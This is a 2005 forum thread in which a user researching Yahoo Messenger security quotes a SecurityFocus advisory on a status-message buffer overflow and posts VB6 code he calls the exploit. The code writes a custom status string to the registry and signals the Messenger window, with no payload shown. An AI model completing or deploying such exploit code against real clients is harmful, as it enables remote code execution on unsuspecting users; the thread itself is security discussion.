tansqrx
Apr 25 2005, 09:21 PM
| | Here's the question. Do you know of any exploits in Yahoo Messenger? The reason that I am asking is I have done quite a bit of research into the security of Messenger over the last 6 months. Actually the reason that I am trying to get web space is to publish some of my findings. I have mapped many of the Yahoo protocol packets and researched several common booters. Once I have the space I will dish out all the details. Do I have any similar Yahoo Messenger enthusiasts around that might be willing to discuss Messenger security? |
Reply
saxsux
Apr 26 2005, 06:59 AM
I don't use Yahoo Messenger much, Google offer a much better alternative - Hello! www.hello.com
Reply
tansqrx
Apr 28 2005, 07:40 PM
Google? I'm talking about Yahoo Messenger not the search engine.
Reply
tansqrx
Apr 28 2005, 07:45 PM
Looks like I may have dug up something on my own. I searched the Full Disclosure Mailing list and found an entry at Security Focus. Yahoo! Messenger Offline Mode Status Remote Buffer Overflow Vulnerability http://www.securityfocus.com/bid/12750QUOTE It has been reported that a remote buffer overflow vulnerability affects Yahoo! Messenger. This issue is due to a failure of the application to securely copy user-supplied input into finite process buffers.
It is likely that the attacker must be in the contact list of an unsuspecting user to exploit this issue. It should be noted that the details surrounding this issue are not clear; this BID will be updated as more details are released.
An attacker may leverage this issue to execute arbitrary code in the context of an unsuspecting user running a vulnerable version of the affected application. QUOTE bugtraq id 12750
object
class Boundary Condition Error
cve CVE-MAP-NOMATCH
remote Yes
local No
published Mar 08, 2005
updated Mar 08, 2005
vulnerable Yahoo! Messenger 4.0
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows XP Home
Yahoo! Messenger 5.0 .1232
Yahoo! Messenger 5.0 .1065
Yahoo! Messenger 5.0 .1046
Yahoo! Messenger 5.0
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows XP Home
Yahoo! Messenger 5.5 .1249
Yahoo! Messenger 5.5
Yahoo! Messenger 5.6 .0.1358
Yahoo! Messenger 5.6 .0.1356
Yahoo! Messenger 5.6 .0.1355
Yahoo! Messenger 5.6 .0.1351
Yahoo! Messenger 5.6 .0.1347
Yahoo! Messenger 5.6
Yahoo! Messenger 6.0 .0.1921
Yahoo! Messenger 6.0 .0.1750
Yahoo! Messenger 6.0 .0.1643
Yahoo! Messenger 6.0
not vulnerable Does anyone have additional info on this exploit? Is it still valid?
Reply
tansqrx
Apr 28 2005, 07:54 PM
This is a quick reply but I have some code questions. After downloading the exploit code from Security Focus I am left with more questions than answers. Below is the code snipet. I know that most expolits are published with lines missing or something important changed to keep the script kiddies from using the exploit. My problems is that this is VB 6 code and I am out of my element on this one. Could someone look at the code and see if it makes sence to them. CODE Public Declare Function EnableWindow Lib "user32" (ByVal hwnd As Long, ByVal fEnable As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Public Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Declare Function SendMessageLong& Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long)
Public Declare Function SendMessageByString Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As String) As Long
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function PlaySoundData Lib "winmm.dll" Alias "PlaySoundA" (lpData As Any, ByVal hModule As Long, ByVal dwFlags As Long) As Long
Public Declare Function ReleaseCapture Lib "user32" () As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function MoveWindow Lib "user32" (ByVal hwnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
Private Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long) As Long
Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Sub CopyMemory Lib "Kernel32" Alias "RtlMoveMemory" (pDest As Any, pSrc As Any, ByVal ByteLen As Long)
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Public Const BM_SETCHECK = &HF1
Public Const BM_GETCHECK = &HF0
Public Const CB_GETCOUNT = &H146
Public Const CB_GETLBTEXT = &H148
Public Const CB_SETCURSEL = &H14E
Public Const GW_HWNDFIRST = 0
Public Const GW_HWNDNEXT = 2
Public Const GW_CHILD = 5
Public Const LB_GETCOUNT = &H18B
Public Const LB_GETTEXT = &H189
Public Const LB_SETCURSEL = &H186
Public Const SW_HIDE = 0
Public Const SW_MAXIMIZE = 3
Public Const SW_MINIMIZE = 6
Public Const SW_NORMAL = 1
Public Const SW_SHOW = 5
Public Const VK_SPACE = &H20
Public Const WM_CHAR = &H102
Public Const WM_CLOSE = &H10
Public Const WM_COMMAND = &H111
Public Const WM_GETTEXT = &HD
Public Const WM_GETTEXTLENGTH = &HE
Public Const WM_KEYDOWN = &H100
Public Const WM_KEYUP = &H101
Public Const WM_LBUTTONDBLCLK = &H203
Public Const WM_LBUTTONDOWN = &H201
Public Const WM_LBUTTONUP = &H202
Public Const WM_MOVE = &HF012
Public Const WM_RBUTTONDOWN = &H204
Public Const WM_RBUTTONUP = &H205
Public Const WM_SETTEXT = &HC
Public Const WM_SYSCOMMAND = &H112
Const ERROR_SUCCESS = 0&
Const REG_SZ = 1
Const REG_DWORD = 4
Public Enum HKeyTypes
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_USER = &H80000001
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
HKEY_PERFORMANCE_DATA = &H80000004
End Enum
Sub YStatus(Status As String)
Dim Name As String
Name = GetString(HKEY_CURRENT_USER, "Software\Yahoo\Pager", "Yahoo! user id")
Call SaveString(HKEY_CURRENT_USER, "Software\Yahoo\Pager\profiles\" + Name + "\Custom Msgs", 1, Status)
Dim X As Long
On Error Resume Next
X = FindWindow("YahooBuddyMain", vbNullString)
SendMessageLong X, &H111, 388, 1&
End Sub
Sub YCap(cap As String)
Dim yahoobuddymain As Long
yahoobuddymain = FindWindow("yahoobuddymain", vbNullString)
Call SendMessageByString(yahoobuddymain, WM_SETTEXT, 0&, cap)
End Sub
Public Function GetString(hKey As HKeyTypes, strPath As String, strValue As String)
Dim keyhand As Long
Dim datatype As Long
Dim lResult As Long
Dim strBuf As String
Dim lDataBufSize As Long
Dim intZeroPos As Integer
Dim lValueType As Long
r = RegOpenKey(hKey, strPath, keyhand)
lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)
If lValueType = REG_SZ Then
strBuf = String(lDataBufSize, " ")
lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)
If lResult = ERROR_SUCCESS Then
intZeroPos = InStr(strBuf, Chr$(0))
If intZeroPos > 0 Then
GetString = Left$(strBuf, intZeroPos - 1)
Else
GetString = strBuf
End If
End If
End If
End Function
Public Sub SaveString(hKey As HKeyTypes, strPath As String, strValue As String, strData As String)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(hKey, strPath, keyhand)
r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strData, Len(strData))
r = RegCloseKey(keyhand)
End Sub
Reply
Recent Queries:--
advapi32.regcreatekeya buffer overflow - 8.78 hr back. (1)
-
exploits for yahoo messenger - 26.15 hr back. (1)
-
free yahoo exploit - 30.10 hr back. (1)
-
yahoo!messenger 4.0 - 31.45 hr back. (1)
-
yahoo massenger of linux 4.0 - 42.53 hr back. (1)
-
webcam exploit - 66.24 hr back. (1)
-
how setup yahoo messenger webcam for window nt workstation - 139.05 hr back. (1)
-
free yahoo id exploits - 159.04 hr back. (1)
-
"advapi32.regcreatekeya" virus - 159.32 hr back. (1)
-
yahoo profiles exploit - 198.89 hr back. (1)
-
ymsg 13 dll - 241.75 hr back. (1)
-
exploits yahoo - 283.87 hr back. (1)
-
yahoo recent exploits - 319.30 hr back. (1)
-
ymsg exploits - 368.62 hr back. (1)
Similar Topics
Keywords : yahoo, messenger, exploits, exploits, ymsg
- Critical Bug In Yahoo! Messenger Webcam Activex
(3)
Yahoo! Messenger Unspecified Activex Buffer Overflow
(1) CNET is reporting that a new Yahoo! Messenger Exploit has been found. The story
(http://news.com.com/2100-1002_3-6144110.html?part=rss&tag=2547-1_3-0-5&subj=news) states that all
versions prior to November 2, 2006 are affected and by downloading the latest version (8.1) you will
be protected. The bug was apparently first reported to Secunia
(http://secunia.com/advisories/23401/). No details or exploit code has been published. No my
question, which ActiveX control does this affect and does anyone of the juicy detail of this one?
Additional links can be found at http....
Yahoo Group Worm
Worm infecting Yahoo Group users through attachment. (7) Those of you who use Yahoo Groups may or may not have already heard this, but about three days ago,
I received an update from one of the groups I am a member of. Inside this notice I found two "New
Graphic Site" messages and one "Virus Warning". The previous two came with attachments. Luckily, I
read the virus warning first before opening them. In the virus warning was this piece of advice:
QUOTE Just a quick warning to members about a virus that is sweeping Yahoo groups. It contains a
number of attachments and the subject line reads "New Graphic Site". Don�....
AOL Instant Messenger Chain Virus
Has anyone else been hit by this? (12) yesterday, i was chatting with a friend and she sent me a link to what looked like a photo file...
when i opened it, it turned out to be a virus... which in turn, automatically messaged all the
people online on my buddy list the link and then closed all chat windows..... does anyone know what
this is? and if so, how do i fix it?....
Elm And Mplayer Exploits!
for Linux (0) There is aa report that some flaws were found today for MPlayer and Elm.
http://www.techworld.com/security/news/index.cfm?newsid=4283 xboxrulz....
Msn Messenger Digital Signature
GAAHHH! (3) When I play MSN Messenger's games, an alert pops up saying: QUOTE Windows has found a
problem with this file. Name: MessengerStatsClient.cab31267.cab Publisher: Unknown Publisher
So I went to check the Digital Signature Information, and it said its Signing Time was Thursday, May
29, 2003 5:56:23 PM. Then I read the Certificate, which was issued by Microsoft Code Signing PCA and
Valid from Thursday, June 27, 2002 6:14:39 PM to Saturday, December 27, 2003 6:24:39 PM. After I
click OK to close the alert, the game says QUOTE Messenger games require ActiveX....
New Virus Alert!
Especially for those MSN messenger users (13) Watch out MSN users! There is a new virus... Maybe its old... But once it get into your computer, it
automatically sends a copy of the virus to all your contacts via MSN messenger... I almost got hit
by one, but norton stopped it! There are many different names it is hiding under... My friend's
computer sent me "The cat and the fan" It sented another copy to my other friend... She got "The
frog and the fish" There are many combinations... So be careful! Sorry to double post, but I found
yet another one... "Mona Lisa wants her smile back" Its another virus! --------....
Looking for yahoo, messenger, exploits, exploits, ymsg
|
*SIMILAR VIDEOS*
Searching Video's for yahoo, messenger, exploits, exploits, ymsg
|
advertisement
|
|
